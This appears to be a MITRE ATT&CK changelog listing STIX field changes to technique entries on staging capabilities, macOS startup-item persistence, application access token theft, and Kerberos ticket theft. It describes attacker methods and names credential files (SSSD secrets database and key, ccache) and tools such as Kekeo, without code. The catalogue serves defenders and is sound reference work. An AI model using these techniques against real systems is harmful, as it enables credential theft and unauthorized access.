| Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:28:41.815000+00:00 | 2022-10-19 22:01:05.551000+00:00 |
| description | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) | Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert) |
| external_references[2]['source_name'] | FireEye CFR Watering Hole 2012 | Netskope GCP Redirection |
| external_references[2]['description'] | Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020. | Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html | https://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection |
| external_references[3]['source_name'] | Gallagher 2015 | Netskope Cloud Phishing |
| external_references[3]['description'] | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. | Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022. |
| external_references[3]['url'] | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ | https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service |
| external_references[5]['source_name'] | Malwarebytes Silent Librarian October 2020 | DigiCert Install SSL Cert |
| external_references[5]['description'] | Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021. | DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021. |
| external_references[5]['url'] | https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/ | https://www.digicert.com/kb/ssl-certificate-installation.htm |
| external_references[6]['source_name'] | Proofpoint TA407 September 2019 | Gallagher 2015 |
| external_references[6]['description'] | Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021. | Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016. |
| external_references[6]['url'] | https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian | http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/ |
| external_references[7]['source_name'] | DigiCert Install SSL Cert | Malwarebytes Heroku Skimmers |
| external_references[7]['description'] | DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021. | Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022. |
| external_references[7]['url'] | https://www.digicert.com/kb/ssl-certificate-installation.htm | https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'} | |
| external_references | {'source_name': 'FireEye CFR Watering Hole 2012', 'description': 'Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html'} | |
| external_references | {'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'} | |
| external_references | {'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'} |
| Old Description | New Description |
|---|---|
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items) This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-24 23:47:39.124000+00:00 | 2022-04-20 16:43:21.560000+00:00 |
| description | Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory.
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Modification |
| Old Description | New Description |
|---|---|
| Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-14 17:56:17.311000+00:00 | 2022-04-21 16:25:11.482000+00:00 |
| description | Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) | Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user. |
| external_references[1]['source_name'] | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 | Amnesty OAuth Phishing Attacks, August 2019 |
| external_references[1]['description'] | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. | Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019. |
| external_references[1]['url'] | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ | https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/ |
| external_references[2]['source_name'] | Microsoft Identity Platform Protocols May 2019 | Auth0 Understanding Refresh Tokens |
| external_references[2]['description'] | Microsoft. (n.d.). Retrieved September 12, 2019. | Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols | https://auth0.com/learn/refresh-tokens/ |
| external_references[3]['source_name'] | Microsoft - OAuth Code Authorization flow - June 2019 | Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 |
| external_references[3]['description'] | Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019. | Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow | https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ |
| external_references[4]['source_name'] | Microsoft - Azure AD App Registration - May 2019 | Trend Micro Pawn Storm OAuth 2017 |
| external_references[4]['description'] | Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019. | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks |
| external_references[5]['source_name'] | Microsoft - Azure AD Identity Tokens - Aug 2019 | Kubernetes Service Accounts |
| external_references[5]['description'] | Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019. | Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022. |
| external_references[5]['url'] | https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens | https://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/ |
| external_references[6]['source_name'] | Amnesty OAuth Phishing Attacks, August 2019 | Microsoft - Azure AD Identity Tokens - Aug 2019 |
| external_references[6]['description'] | Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019. | Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019. |
| external_references[6]['url'] | https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/ | https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens |
| external_references[7]['source_name'] | Trend Micro Pawn Storm OAuth 2017 | Microsoft - Azure AD App Registration - May 2019 |
| external_references[7]['description'] | Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019. | Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019. |
| external_references[7]['url'] | https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks | https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Microsoft - OAuth Code Authorization flow - June 2019', 'description': 'Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow'} | |
| external_references | {'source_name': 'Microsoft Identity Platform Protocols May 2019', 'description': 'Microsoft. (n.d.). Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols'} | |
| x_mitre_contributors | Suzy Schapperle - Microsoft Azure Red Team | |
| x_mitre_contributors | Ram Pliskin, Microsoft Azure Security Center | |
| x_mitre_contributors | Jen Burns, HubSpot | |
| x_mitre_platforms | Containers |
| Old Description | New Description |
|---|---|
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT) |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf configuration file and the KRB5CCNAME environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit, klist, ktutil, and kcc built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
|
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
